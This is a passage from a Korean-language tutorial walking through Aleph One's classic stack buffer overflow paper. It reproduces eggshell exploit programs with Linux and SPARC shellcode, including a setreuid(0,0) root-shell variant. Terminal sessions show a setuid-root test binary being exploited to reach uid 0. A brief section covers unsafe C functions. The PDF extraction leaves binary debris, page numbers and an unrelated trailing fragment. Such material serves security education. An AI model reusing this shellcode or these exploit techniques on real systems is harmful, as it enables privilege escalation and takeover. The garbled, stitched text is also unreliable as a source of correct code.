혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨혨 1?f? 1?f? 1? 좫???^혟1? 혞F혟F? 혟? 혥혥V??1? 黎???/bin/sh USER=vangelis LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01; 05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=0 0;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31: *.zip=00;31:*.z=00;31:*.z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31 :*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*. tif=00;35: SSH_AUTH_SOCK=/tmp/ssh-XXfrUrwx/agent.811 PVM_ROOT=/usr/share/pvm3 USERNAME=root 135

137 SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/811 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/b in MAIL=/var/spool/mail/root PWD=/home/vangelis/test/bof INPUTRC=/etc/inputrc LANG=ko_KR.eucKR GDMSESSION=Default SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass SHLVL=5 HOME=/home/vangelis GNOME_DESKTOP_SESSION_ID=Default BASH_ENV=/root/.bashrc LOGNAME=vangelis LESSOPEN= /usr/bin/lesspipe.sh %s DISPLAY=:0 RET?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? G_BROKEN_FILENAMES=1 XAUTHORITY=/home/vangelis/.xauthSyyvp7 COLORTERM=gnome-terminal _=/bin/env bof]$ 위의결과에서진하게되어있는부분을보면, 앞에서도말했듯이터미널에서는그냥공백으로보이지만실제이것은공백이아니며, 텍스트편집기로살펴보면일부기계어들이깨져있지만 F B 등이들어가있는것을볼수있다. Aleph One의원문을보면마지막부분에나오는 Appendix B에 eggshell.c라는소스가별도로나온다. 그런데우리나라에서는이와달리대부분 exploit4.c를흔히들 eggshell이라고부르고있다. 이는 exploit4.c도환경변수에나오는항목 EGG에쉘코드를넣어주기때문에 eggshell이라고부르고있는것같다. 아마도편이성때문에 exploit4.c를 eggshell로많이들사용하고있는것같다. 편의상필자도 exploit4.c를 eggshell이라고부를것이며, 그리고우리가특정소스에너무국한되어 eggshell이라고지칭할필요는없다고생각한다. eggshell이라는것이환경변수의항목 EGG에쉘 (shell) 을실행하는쉘코드를넣어주기때문에이를합쳐 eggshell 이라고부르는것뿐이기때문이다. exploit4.c라는소스에환경변수의항목으로들어갈 EGG를 MINI라고고친다면 minishell 이라고할수있는것아닌가. 그리고 136

138 eggshell 의역할을하는것의종류에도한가지만있는것은아니다. 다음도공격에사용되는 eggshell 이다. 필자가재미삼아 minishell.c 이라는이름을붙였다. minishell.c #include <unistd.h> #include <stdio.h> #include <stdlib.h> char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* NOP */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0, 0); */ "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73" /* execve("/bin/bash", NULL) */ "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24" "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80" "x31\xc0\xb0\x01\xcd\x80"; /* exit(0); */ int main(void) { memcpy(shellcode, "MINI=", 4); putenv(shellcode); system("/bin/sh"); get_eg_addr.c #include <stdio.h> #include <stdlib.h> int main(void) { printf("egg address: %p n", getenv("mini"));

139 Aleph One의원문에는 eggshell을이용해글이발표된그당시의취약점에대해공략하는과정이나오지만이글에서는다룰필요가없다는생각이든다. 환경변수에항목을추가하는것과공략하는과정이간략하게나오는데, 왜당시의취약점을공략하는것을설명할필요가없는지와환경변수에항목을추가하는방법에대해서는이미언급을했었다. 대신필자는 eggshell을이용하여오버플로우취약점을가진프로그램을공략하는과정에서발생하는간단한문제와오버플로우공격을비롯한시스템해킹분야에서자주사용되는 perl의사용법에대해간단히설명하고이섹션을마칠생각이다. 필자가종종접하게되는질문중에서, 취약한프로그램이 root 소유이며, 공격에도성공한것같은데 root 쉘이획득되지않는다는것이다. 이것은 eggshell.c에사용되는쉘코드문제때문인경우가대부분이다. 우리가사용하는 eggshell.c에사용하는쉘코드는여러가지가있는데, 초기 eggshell에서는 Aleph One이작성한쉘코드를사용하였기때문에취약한프로그램이 root 소유였지만 root 쉘을실행하지못했다. 그래서 root 쉘을공략할때는 root 쉘을실행하는코드를넣어야만한다. 앞에서살펴보았던 vulnerable.c를 root 소유로바꾼후그취약한프로그램에대해먼저 Aleph One의쉘코드를그대로사용해보고, 두번째는 setreuid(0, 0) 코드를추가해공격해보기로한다. 더불어이제부터는 perl을이용해공격해보기로하겠다. bof]$ vi eggshell.c #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { 138

140 asm ("movl %esp,%eax"); int main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i, eggsize=default_egg_size; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("can't allocate memory. n"); exit(0); if (!(egg = malloc(eggsize))) { printf("can't allocate memory. n"); exit(0); addr = get_esp() - offset; printf("using address: 0x%x n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) 139

141 *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = ' 0'; egg[eggsize - 1] = ' 0'; memcpy(egg,"egg=",4); putenv(egg); memcpy(buff,"ret=",4); putenv(buff); system("/bin/bash"); ~ ~ [vangelis@localhost bof]$ gcc -o eggshell eggshell.c [vangelis@localhost bof]$ su Password: [vangelis@localhost bof]# chmod 4777 vulnerable [vangelis@localhost bof]# chown root vulnerable [vangelis@localhost bof]# chgrp root vulnerable [vangelis@localhost bof]# ls al -rwsrwxrwx 1 root root 월 15 00:10 vulnerable [vangelis@localhost bof]# su vangelis [vangelis@localhost bof]$./eggshell Using address: 0xbffff8f8 [vangelis@localhost bof]$./vulnerable `perl e print \xf8\xf8\xff\bf x132 ` sh-2.05b$ id uid=500(vangelis) gid=500(vangelis) groups=500(vangelis) 140

142 위의결과를보면쉘은실행되었나 root 쉘이실행되지않았다. 분명히소유자및그룹모두 root 인데말이다. 이제 eggshell 에사용되는쉘코드를수정해보자. bof]$ vi eggshell2.c #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0, 0); */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { asm ("movl %esp,%eax"); int main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i, eggsize=default_egg_size; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("can't allocate memory. n"); 141

143 exit(0); if (!(egg = malloc(eggsize))) { printf("can't allocate memory. n"); exit(0); addr = get_esp() - offset; printf("using address: 0x%x n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = ' 0'; egg[eggsize - 1] = ' 0'; memcpy(egg,"egg=",4); putenv(egg); memcpy(buff,"ret=",4); putenv(buff); system("/bin/bash"); ~ ~ 142

144 bof]$ gcc -o eggshell2 eggshell2.c bof]$./eggshell2 Using address: 0xbffff8f8 bof]$./vulnerable `perl -e print \xf8\xf8\xff\bf x132 ` sh-2.05b# sh-2.05b# id uid=0(root) gid=500(vangelis) groups=500(vangelis) sh-2.05b# whoami root sh-2.05b# 드디어 root 쉘이떴다. setreuid(0, 0) 쉘코드를추가하면간단하게 root 권한을획득할수 있었다. 이제마지막으로 perl 의사용법 24 에대해서간단히알아보자. perl 의사용법은 프롬프트상에서 perl h 명령을내려보면그사용법을알수있다. [vangelis@localhost bof]$ perl -h Usage: perl [switches] [--] [programfile] [arguments] -0[octal] specify record separator ( 0, if no argument) -a autosplit mode with -n or -p (splits $_ -C enable native wide character system interfaces -c check syntax only (runs BEGIN and CHECK blocks) -d[:debugger] run program under debugger -D[number/list] set debugging flags (argument is a bit mask or alphabets) -e 'command' one line of program (several -e's allowed, omit programfile) -F/pattern/ split() pattern for -a switch (//'s are optional) -i[extension] edit <> files in place (makes backup if extension supplied) -Idirectory directory (several -I's allowed) -l[octal] enable line ending processing, specifies line terminator -[mm][-]module execute `use/no module...' before executing program -n assume 'while (<>) {... ' loop around program -p assume loop like -n but print line also, like sed -P run program through C preprocessor before compilation -s enable rudimentary parsing for switches after programfile -S look for programfile using PATH environment variable -T enable tainting checks 24 에 perl 관련많은자료들을구할수있다. 초보자들도비교적쉽게볼수있는자 료는 을참고하길바란다. 143

145 -u dump core after parsing program -U allow unsafe operations -v print version, subversion (includes VERY IMPORTANT perl info) -V[:variable] print configuration summary (or a single Config.pm variable) -w enable many useful warnings (RECOMMENDED) -W enable all warnings -X disable all warnings -x[directory] strip off text before #!perl line and perhaps cd to directory [vangelis@localhost bof]$ 위의공격과정에서다음부분을보자. [vangelis@localhost bof]$./vulnerable `perl -e print \xf8\xf8\xff\bf x132 ` 우선 perl 앞에 ` 이붙어있다. 이것은작은따옴표 (single quotation) 와는다른백쿼테이션 (back quotation) 또는백쿼트 (back quote) 라고도부른다. 독자여러분들의키보드에 ~ 문자가있는자판을보면 ~ 아래에같이있을것이다. 이것은 vulnerable이라는프로그램은실행시인자를받아들일수있는데 (void main(int argc, char *argv[])), 그인자로써펄스크립트를받아들이고있다. 펄스크립트를인자로받아들일때 `` 백쿼트안에펄스크립트부분을묶어서넣는다. 즉, 다음과같은구조로되어있다. $./program `perl e ` perl 뒤에 -e 스위치를붙이면그다음명령을실행하라는의미가있다. e 스위치다음에 실행될명령어앞과그종결부분에따옴표 ( ) 를붙이고, 아래와같이 print 라는명령뒤에 출력될것이 wohacker 라는문자열일경우쌍따옴표 ( ) 를붙인다. $ perl -e 'print "wowhacker!\n"' wowhacker! 이제앞의공격과정에서나왔던다음부분을정리해보자. [vangelis@localhost bof]$./vulnerable `perl -e print \xf8\xf8\xff\bf x132 ` 먼저 vulnerable 이라는프로그램을실행하는데, 이프로그램은인자를실행시받아들일수 있다. 여기서는오버플로우취약점을가진이 vulnerable 이라는프로그램은실행시인자로서 perl 스크립트를인자로받아들이는데, perl 스크립트를인자로받아들일때는백쿼트를시작 144

146 부분과끝부분에사용한다. `perl -e print \xf8\xf8\xff\bf x132 ` 부분에서는 eggshell 을실행했을 때나온쉘코드와 NOP 코드를담고있는환경변수의항목인 EGG 의주소값을 perl 스크립트 명령과함께넘겨주고, 이결과쉘을획득할수있게된다. Finding Buffer Overflows 이섹션은버퍼오버플로우취약점을가진프로그램을찾아내는방법에대해서말하고있다. 주로바운드체킹을하지않는함수들에대한간략한소개정도인데, 각각의함수들에대해서는독자들이 C 언어로직접코딩을할때문제점들을느끼는것이좋을듯싶다. 필자는 Aleph One의원문에간략한설명을추가하는정도에서그칠것이다. 버퍼오버플로우취약점은앞에서도알아보았듯이지정된데이터보다더많은데이터를버퍼에넣고자할때발생한다. C 언어에서사용되는함수들중에서는바운드체킹을하지않는것들이있다. 특히, 문자열을다루는함수들중에서바운드체킹을하지않을경우오버플로우취약점을초래할수있는것들은 strcat(), strcpy(), sprintf(), 그리고 vsprintf() 등의함수들이대표적이다. 이함수들은널문자를만날때까지바운드체킹없이문자열을받아들인다. 만약 void main(int argc, char *argv[]) 의형태가사용된소스코드에이함수들이사용되었다면유심히살펴볼필요가있을것이다. 또다른위험한함수는 gets() 이다. 이함수는개행문자 (\n) 또는 EOF를만날때까지표준입력 (stdin) 으로부터한라인을받아들이는데, 역시바운드체킹을하지않는함수이다. 리눅스에서 gcc 로 gets() 함수가포함된소스를컴파일해본사람이면 the `gets' function is dangerous and should not be used. 와같은경고문이나오는것을보았을것이다. scanf() 함수계열도만약비공백문자 (%s) 들의시퀸시와매칭이되거나지정된 set(%[]) 으로부터문자들의비공백시퀸시와매칭이된다면문제가될수있다. 즉, 문자열의최대길이를확인하지않고데이터를문자열로보내기위해이함수들을사용한다면오버플로우문제가발생한다는것이다. 참고로공백문자 (whitespace character) 란토큰 (token) 을분리하기위해서사용되는것이다. 많이사용되는공백문자에는 space, tab, 개행문자 (newline) 등이있다는것은잘알고있을것이다. 그리고 char 형포인터에의해포인터된배열이문자들의전체시퀸시를받아들이기에충분치않거나최대필더폭을정의하지않는다면또한오버플로우의문제가될수있다. 만약앞에서언급된함수들의 145

147 타겟이지정된크기의버퍼를가지고있고, 사용자가입력한데이터를인수로가진다면오버플로우취약점을공격해서성공할수있는가능성이있다. 또다른하나의버퍼오버플로우취약점을찾을수있는프로그래밍상의구성은라인의끝, 파일의끝, 또는어떤다른 delimiter 에도달할때까지어떤파일이나표준입력으로부터버퍼로한번에하나의문자를읽어들이기위해 while() 루프를사용하는경우이다. delimiter란프로그래밍에서문자열의시작과끝을확인해주는문자로서, 문자열의일부는아니다. 보통명령문에서 space, backslash(\), forward slash(/) 가 delimiter 이다. 이런타입의구성을사용하는함수들은 getc(), fgetc(), 또는 getchar() 이다. while 루프를사용하는데있어적절한체크가없다면오버플로우공격이가능해진다. 그리고 David A. Wheeler라는사람이작성한 Secure Programming for Linux and Unix HOWTO 25 라는글의 6장 Avoid Buffer Overflow 26 라는부분을참고하면이섹션을공부하는데도움이될것이다. 마지막으로 Aleph One 이결론을지으면서 grep 을잘활용하면오버플로우취약점을가지고있는프로그램을찾아낼수있다고말하고있다. grep 은어떤패턴에일치하는라인을찾아출력해주는프로그램이다. grep 의자세한사용법에대해서는리눅스맨페이지를참고하길바란다. Aleph One은최종적으로오픈소스와상용운영체제나유틸리티의관계에대해서간략하고언급하고있는데, 그요지는다음과같다. 우리가보안이나해킹공부를할때느끼는어려움들중의하나가고가의서버를직접사용해볼기회가적다는것이며, 이것은필자나독자여러분들이모두느끼는공통된것이다. 고가의서버에서사용되는어플리케이션역시마찬가지다. 그런데리눅스와같이그소스가공개되어있는운영체제나소스가공개되어있는어플리케이션의경우취약점이각종보안관련메일링리스트에자주발표된다. 이것은다른고가의서버나소스가공개되지않은상용어플리케이션보다오픈소스가보안상의취약점을더많이가지고있다는것을전적으로의미하지는않는다. 소스가공개되어있지않기때문에그만큼취약점을찾아낼기회가적을뿐이다. 아이러니컬하게도많은상용운영체제의유틸리티들이오픈소스와같은소스에서유래했다는것이다. 이것은소스가공개되지않아도비슷한기능을하고있는상용프로그램들의취약점을유추할수있는근거가된다. 그러니오픈소스를잘활용하여취약점을발견하는데도움이되도록해야한다

148 Appendix A - Shellcode for Different Operating Systems/Architectures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ i386/linux jmp 0x1f popl %esi movl %esi,0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) movb $0xb,%al movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 xorl %ebx,%ebx movl %ebx,%eax inc %eax int $0x80 call -0x24.string "/bin/sh " SPARC/Solaris sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 ta 8 xor %o7, %o7, %o0 mov 1, %g1 ta

149 SPARC/SunOS sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 mov -0x1, %l5 ta %l5 + 1 xor %o7, %o7, %o0 mov 1, %g1 ta %l

150 Appendix B - Generic Buffer Overflow Program ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode.h #if defined( i386 ) && defined( linux ) #define NOP_SIZE 1 char nop[] = " x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { asm ("movl %esp,%eax"); #elif defined( sparc ) && defined( sun ) && defined( svr4 ) #define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; unsigned long get_sp(void) { asm ("or %sp, %sp, %i0"); #elif defined( sparc ) && defined( sun ) #define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff" "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01"; unsigned long get_sp(void) { asm ("or %sp, %sp, %i0"); #endif

151 eggshell.c /* * eggshell v1.0 * * Aleph One / [email protected] */ #include <stdlib.h> #include <stdio.h> #include "shellcode.h" #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 void usage(void); void main(int argc, char *argv[]) { char *ptr, *bof, *egg; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i, n, m, c, align=0, eggsize=default_egg_size; /* while 루프를돌면서 getopt() 함수를이용하여 align, bsize, eggsize, offset 값세팅 */ while ((c = getopt(argc, argv, "a:b:e:o:"))!= EOF) switch (c) { case 'a': align = atoi(optarg); break; case 'b': bsize = atoi(optarg); break; case 'e': eggsize = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case '?': usage(); exit(0); /* shellcode 의크기가 eggsize 보다크면프로그램종료 */ 150

152 if (strlen(shellcode) > eggsize) { printf("shellcode is larger the the egg. n"); exit(0); /* bof 포인터변수에메모리할당. 실패하면프로그램종료 */ if (!(bof = malloc(bsize))) { printf("can't allocate memory. n"); exit(0); /* egg 포인터변수에메모리할당. 실패하면프로그램종료 */ if (!(egg = malloc(eggsize))) { printf("can't allocate memory. n"); exit(0); /* 리턴어드레스를덮어씌울주소값 (addr 변수 ) 으로현재의 stack pointer 값에서 offset 만큼뺀값으로설정. addr 은 eggshell 을띄울환경변수 EGG 의예상시작주소로사용됨 */ addr = get_sp() - offset; printf("[ Buffer size:\t%d\t\tegg size:\t%d\taligment:\t%d\t]\n", bsize, eggsize, align); printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset); /* bsize(bof 크기 ) 만큼 addr_ptr 에예상시작주소 (addr) 대입. 결과적으로 bof 변수는다음과같은내용을포함하게됨 bsize [ addr ][ addr ][ addr ]... [ addr ] */ addr_ptr = (long *) bof; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; /* eggsize 에 shellcode 의크기를뺀만큼 NOP 를할당. egg 변수는다음과같은값을가지게됨 */ 0 eggsize [ NOP ][ NOP ][ NOP ]... [ NOP ][ NOP ][ garbage ] 151

153 ptr = egg; for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE) /* CPU 에따라다른크기의 NOP_SIZE 를반영하기위하여 align 값단위로 NOP 할당. NOP_SIZE 와 nop[] 는 shellcode.h 에선언되어있음 */ for (n = 0; n < NOP_SIZE; n++) { m = (n + align) % NOP_SIZE; *(ptr++) = nop[m]; /* egg 변수의 [ garbage ] 부분에 shellcode 를대입. 결과적으로 egg 변수는다음과같은값을가지게됨 */ 0 eggsize [ NOP ][ NOP ][ NOP ]... [ NOP ][ NOP ][ shellcode ] for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; /* egg 의앞부분 4 바이트부분에 "EGG=" 문자열을대입하고, bof 의앞부분 4 바이트부분에 "RET=" 문자열을대입한후 putenv() 함수를이용하여환경변수로각각설정함. 이후 system() 함수를통한새로운 /bin/bash 을실행하여 EGG 와 RET 를환경변수로각각할당함 -=[ egg ]=- 0 eggsize [ EGG= ][ NOP ][ NOP ]... [ NOP ][ NOP ][ shellcode ] */ -=[ bof ]=- 0 bsize [ RET= ][ addr ][ addr ]... [ addr ] bof[bsize - 1] = ' 0'; egg[eggsize - 1] = ' 0'; memcpy(egg,"egg=",4); putenv(egg); memcpy(bof,"bof=",4); putenv(bof); system("/bin/sh"); 152

154 void usage(void) { (void)fprintf(stderr, "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>] n");

모두 보기

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS